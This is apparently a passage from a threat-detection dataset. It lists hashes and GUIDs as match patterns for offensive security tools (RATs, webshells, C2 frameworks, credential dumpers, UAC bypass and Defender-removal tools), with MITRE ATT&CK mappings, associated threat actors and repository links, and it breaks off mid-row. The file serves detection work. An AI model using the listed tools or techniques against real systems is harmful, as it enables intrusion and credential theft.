"*37c8e2bf772fd684c117fbf61f18c99e5d2e7c7a00cd175534e32f9835fb72e3*",".{0,1000}37c8e2bf772fd684c117fbf61f18c99e5d2e7c7a00cd175534e32f9835fb72e3.{0,1000}","offensive_tool_keyword","Malware RAT collection","from 
Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24700" "*37d1dfeec72edc0814efec084b8794847d250291eaadf0fbc9b9e2c5602b32ab*",".{0,1000}37d1dfeec72edc0814efec084b8794847d250291eaadf0fbc9b9e2c5602b32ab.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24701" "*37da8267b295caeca8fadb13206ba1c498a7012673430c5d856fe93862446a28*",".{0,1000}37da8267b295caeca8fadb13206ba1c498a7012673430c5d856fe93862446a28.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","#filehash","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","24703" "*37E20BAF-3577-4CD9-BB39-18675854E255*",".{0,1000}37E20BAF\-3577\-4CD9\-BB39\-18675854E255.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","24705" "*37e6098a386e8850aba3de35055a38cfd2942cbacf99968da84d85c41c343481*",".{0,1000}37e6098a386e8850aba3de35055a38cfd2942cbacf99968da84d85c41c343481.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - 
TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24706" "*37eda44266178cf5b5b932e2dd45c12d65d1379221ed6f77a174d517e3787ba0*",".{0,1000}37eda44266178cf5b5b932e2dd45c12d65d1379221ed6f77a174d517e3787ba0.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","24708" "*37ee54a15c44f222327a9d77243113c2b0efb07451eca2f887d314b6e0963f86*",".{0,1000}37ee54a15c44f222327a9d77243113c2b0efb07451eca2f887d314b6e0963f86.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#filehash","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","24709" "*37ef8b7afc3687a48d331b98d1e4c350752ad943f58c9aa5a23d4fccb58dd574*",".{0,1000}37ef8b7afc3687a48d331b98d1e4c350752ad943f58c9aa5a23d4fccb58dd574.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24710" "*37f034844006f3465f1021aa74ba44b8013e1cb31014e4207bbb1e6800cf6bf5*",".{0,1000}37f034844006f3465f1021aa74ba44b8013e1cb31014e4207bbb1e6800cf6bf5.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large 
Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","24711" "*37f414a4928417fe375e6ba23c4028681bdfb1dd8d0130b20260caf3a4d33485*",".{0,1000}37f414a4928417fe375e6ba23c4028681bdfb1dd8d0130b20260caf3a4d33485.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24712" "*37f49e38ee8cc509bcae0842800b3d0c85072d6e56a8395aede48abeef0b9f28*",".{0,1000}37f49e38ee8cc509bcae0842800b3d0c85072d6e56a8395aede48abeef0b9f28.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24713" 
"*37fb5ca215c18dea99181660add5055805856ab73254c899860350b0d67cdd8f*",".{0,1000}37fb5ca215c18dea99181660add5055805856ab73254c899860350b0d67cdd8f.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24715" "*37ffc17e18e52704214b980c56fad5a3ee6c9941905a9b76a3c914d82f3d1a61*",".{0,1000}37ffc17e18e52704214b980c56fad5a3ee6c9941905a9b76a3c914d82f3d1a61.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","24716" "*380250752583ba94bf2f4c2b1fef9d9890615099e600b77f01fa0f15f94e3c1c*",".{0,1000}380250752583ba94bf2f4c2b1fef9d9890615099e600b77f01fa0f15f94e3c1c.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#filehash","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","24718" 
"*380412e02376173ec8b908679c7f74053cc8199c9ed3138b8b54a6175ddb08d1*",".{0,1000}380412e02376173ec8b908679c7f74053cc8199c9ed3138b8b54a6175ddb08d1.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24719" "*38074409fb6889d1a58cbda706a1167410e4a640630cf128472902a5967074af*",".{0,1000}38074409fb6889d1a58cbda706a1167410e4a640630cf128472902a5967074af.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","24720" "*3809f2663ab0d7408d98b48c70b1d737d7b9d9b175ad66fb2d4cad8cc636b239*",".{0,1000}3809f2663ab0d7408d98b48c70b1d737d7b9d9b175ad66fb2d4cad8cc636b239.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24721" "*381135de47985bd9d5079830dae251313b9f08458da9e8185b6253d8e477fd9c*",".{0,1000}381135de47985bd9d5079830dae251313b9f08458da9e8185b6253d8e477fd9c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24724" "*381448682cb5ea5ff1bc8bfd3462e637da0445fc74fdb60e0de5e11d8c2dc90d*",".{0,1000}381448682cb5ea5ff1bc8bfd3462e637da0445fc74fdb60e0de5e11d8c2dc90d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24725" "*38189c5fd3ff9946f4498d31e11bb47e49e276e445050f1b9ba9d84b40e55c65*",".{0,1000}38189c5fd3ff9946f4498d31e11bb47e49e276e445050f1b9ba9d84b40e55c65.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24726" "*382B6332-4A57-458D-96EB-B312688A7604*",".{0,1000}382B6332\-4A57\-458D\-96EB\-B312688A7604.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","24728" "*382c77a7693178867a24912db26b69a1fe5d508cde83ea89309758ef5d001e44*",".{0,1000}382c77a7693178867a24912db26b69a1fe5d508cde83ea89309758ef5d001e44.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - 
T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","24729" "*382dbe7341c3b3970dacf304a4de5a6df18fa39cf13d4ca3e4441aa912e100f8*",".{0,1000}382dbe7341c3b3970dacf304a4de5a6df18fa39cf13d4ca3e4441aa912e100f8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24730" "*383b8dcb968b6bd0633658d9bb55c4acaf4c85a075aa456904a42d4e4efd5561*",".{0,1000}383b8dcb968b6bd0633658d9bb55c4acaf4c85a075aa456904a42d4e4efd5561.{0,1000}","offensive_tool_keyword","Credphisher","prompt a user for credentials using a Windows credential dialog","T1056.002 - T1003 ","TA0006","N/A","N/A","Credential Access","https://github.com/ryanmrestivo/red-team/blob/1e53b7aa77717a22c9bd54facc64155a9a4c49fc/Exploitation-Tools/OffensiveCSharp/CredPhisher","1","0","#filehash","N/A","7","2","136","34","2024-10-18T12:12:38Z","2021-04-12T00:00:03Z","24731" "*384218806db2a3031a7582b461084ce83d1646241574f325b0454bffd6c5ae9a*",".{0,1000}384218806db2a3031a7582b461084ce83d1646241574f325b0454bffd6c5ae9a.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24733" "*3843b02a960a6d676a9166a51da80aed18937ea0b582895b6b2780fff58417bd*",".{0,1000}3843b02a960a6d676a9166a51da80aed18937ea0b582895b6b2780fff58417bd.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24734" "*3855e59bb3240198350cfa740f6a568f4f7510e174ec37f08a385dddd31cb0c6*",".{0,1000}3855e59bb3240198350cfa740f6a568f4f7510e174ec37f08a385dddd31cb0c6.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","24735" "*385a076cf8b909062acbb4df72012aee93fce1cd6d1a0b3c12ee7d3f7bc2f464*",".{0,1000}385a076cf8b909062acbb4df72012aee93fce1cd6d1a0b3c12ee7d3f7bc2f464.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - 
TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","24736" "*385a18846808ae7f07d1be33dfe8c850736eec33910e1366fdff14bb4384b690*",".{0,1000}385a18846808ae7f07d1be33dfe8c850736eec33910e1366fdff14bb4384b690.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24737" "*385b94df8c0ad36fe074e09b69c06f427da95958555690ae65a51fd913f5a4ba*",".{0,1000}385b94df8c0ad36fe074e09b69c06f427da95958555690ae65a51fd913f5a4ba.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","24738" "*3864f0d44f90404be0c571ceb6f95bbea6c527bbfb2ec4a2b4f7d92e982e15a2*",".{0,1000}3864f0d44f90404be0c571ceb6f95bbea6c527bbfb2ec4a2b4f7d92e982e15a2.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation 
tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","24739" "*38698c9ebb4f24b1b11d2b5c023c72b24c1e68de5bd2bc04384e85a1467e0a00*",".{0,1000}38698c9ebb4f24b1b11d2b5c023c72b24c1e68de5bd2bc04384e85a1467e0a00.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","24740" "*386b7c0bfd847142ecd41646e39f24f5d8dd18f1f9c897bfcb5c19a2cb4edea9*",".{0,1000}386b7c0bfd847142ecd41646e39f24f5d8dd18f1f9c897bfcb5c19a2cb4edea9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24741" "*386ca395c1fb8ca41e5371807ffc70f06bf161ddd8a24afb34f0d9132271243e*",".{0,1000}386ca395c1fb8ca41e5371807ffc70f06bf161ddd8a24afb34f0d9132271243e.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24742" "*38707a769a7eb4bd3e4165eaa94d727b33e7a83d974464c5f6a4fb9d6ef7d43f*",".{0,1000}38707a769a7eb4bd3e4165eaa94d727b33e7a83d974464c5f6a4fb9d6ef7d43f.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","#filehash","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","24743" "*387416cccea393e9e9eb2c069edabbf7297226037cc374d9a358ce1020696a5d*",".{0,1000}387416cccea393e9e9eb2c069edabbf7297226037cc374d9a358ce1020696a5d.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","24744" "*3874c97fddb57971c35e02b68b74709f05ed396c19dceacadf4d9432c5a0206f*",".{0,1000}3874c97fddb57971c35e02b68b74709f05ed396c19dceacadf4d9432c5a0206f.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - 
TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","24747" "*38782e6ee72ae26ccbdf20f4179ebeb94ed5c1e9a358dce59ac5e220336ab3c7*",".{0,1000}38782e6ee72ae26ccbdf20f4179ebeb94ed5c1e9a358dce59ac5e220336ab3c7.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24749" "*387930bab7650291baada3b39dc55167c1e6f1fd2154de61f77e07bd14c8b9bc*",".{0,1000}387930bab7650291baada3b39dc55167c1e6f1fd2154de61f77e07bd14c8b9bc.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. 
removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","APT39","Credential Access","https://github.com/GhostPack/SafetyKatz","1","0","#filehash","N/A","10","10","1257","247","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z","24750" "*387938818fcc342d03c211123e30922e0d219262a66b988bbe54b6958edfb73b*",".{0,1000}387938818fcc342d03c211123e30922e0d219262a66b988bbe54b6958edfb73b.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24751" "*387e21adbabeddf80db5d2868f93d6bdba8443dc26fdb964ec6e279f3d02310c*",".{0,1000}387e21adbabeddf80db5d2868f93d6bdba8443dc26fdb964ec6e279f3d02310c.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","#filehash","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","24752" "*3882d5cf0114c24977f1cd1317618c9d8a17647d0f4aaea7818f1f38332ad848*",".{0,1000}3882d5cf0114c24977f1cd1317618c9d8a17647d0f4aaea7818f1f38332ad848.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24754" 
"*388cab24c7ad1eab00833aa5200541295ba3e17d39d01636f2a8bbb37c732b00*",".{0,1000}388cab24c7ad1eab00833aa5200541295ba3e17d39d01636f2a8bbb37c732b00.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","24757" "*388f88340ab9e87c70b35cd3c2ea54993328d291c8606017507fa9fe3c768392*",".{0,1000}388f88340ab9e87c70b35cd3c2ea54993328d291c8606017507fa9fe3c768392.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","24759" "*389081eec49334d1d6ef3ba46e2167f6f3010443cf39a4f2e431b274fb58c369*",".{0,1000}389081eec49334d1d6ef3ba46e2167f6f3010443cf39a4f2e431b274fb58c369.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24760" "*3890a3df1d59c7b9accc11721287353ba992630fccf9ffc9361cb7184af8fbda*",".{0,1000}3890a3df1d59c7b9accc11721287353ba992630fccf9ffc9361cb7184af8fbda.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers 
